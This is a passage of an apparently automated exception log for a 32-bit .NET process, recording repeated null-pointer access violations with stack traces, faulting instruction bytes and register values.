CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793956
registers.edi: 34794300
registers.eax: 0
registers.ebp: 34793964
registers.edx: 0
registers.ebx: 34796932
registers.esi: 41369968
registers.ecx: 42496252
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7b864c
0xa7b7ee2
0xa7b7dcd
0xa7b666b
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793956
registers.edi: 34794300
registers.eax: 0
registers.ebp: 34793964
registers.edx: 0
registers.ebx: 34796932
registers.esi: 41369968
registers.ecx: 40036572
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7b864c
0xa7b7ee2
0xa7b7dcd
0xa7b666b
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793956
registers.edi: 34794300
registers.eax: 0
registers.ebp: 34793964
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021596
registers.ecx: 41312920
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bd1f6
0xa7bcab1
0xa7b7db5
0xa7b6954
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793932
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793940
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021596
registers.ecx: 42621760
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bd1f6
0xa7bcab1
0xa7b7dcd
0xa7b6954
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793932
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793940
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021596
registers.ecx: 44013972
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bd1f6
0xa7bcab1
0xa7b7dcd
0xa7b6954
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793932
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793940
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021596
registers.ecx: 45360736
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bdb22
0xa7bd4c9
0xa7b7db5
0xa7b6a6c
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793984
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793992
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021596
registers.ecx: 40570688
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bdb22
0xa7bd4c9
0xa7b7dcd
0xa7b6a6c
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793984
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793992
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021536
registers.ecx: 41964624
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bdb22
0xa7bd4c9
0xa7b7dcd
0xa7b6a6c
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34793984
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34793992
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021536
registers.ecx: 43358272
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7be234
0xa7bdc91
0xa7b7db5
0xa7b6b72
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34794016
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34794024
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021536
registers.ecx: 40371016
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7be234
0xa7bdc91
0xa7b7dcd
0xa7b6b72
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34794016
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34794024
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021536
registers.ecx: 41603128
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7be234
0xa7bdc91
0xa7b7dcd
0xa7b6b72
0xa7b5801
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34794016
registers.edi: 34794324
registers.eax: 0
registers.ebp: 34794024
registers.edx: 0
registers.ebx: 34796932
registers.esi: 40021536
registers.ecx: 42999400
1 0 0

__exception__

 stacktrace: 
0xa7bc6e8
0xa7bf5bb
0xa7beb66
0xa7b5859
0x22fd9ff
0x22f7855
0x22f6f0b
0x22f3c6b
0x22f35d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72df2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72e0264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72e02e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72eb74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72eb7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72f41dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72f41e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72f41f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72f4416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa7bc72b
registers.esp: 34794836
registers.edi: 34795100
registers.eax: 0
registers.ebp: 34794844
registers.edx: 0
registers.ebx: 34796932
registers.esi: 43568308
registers.ecx: 43575284
1 0 0

__exception__

 stacktrace: 
0x2269651
0x2269453
0x2267710
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x2269788
registers.esp: 35909540
registers.edi: 35909592
registers.eax: 0
registers.ebp: 35909604
registers.edx: 5524232
registers.ebx: 35911044
registers.esi: 42184668
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa869b94
0xa86942a
0xa8692fd
0xa867bb3
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
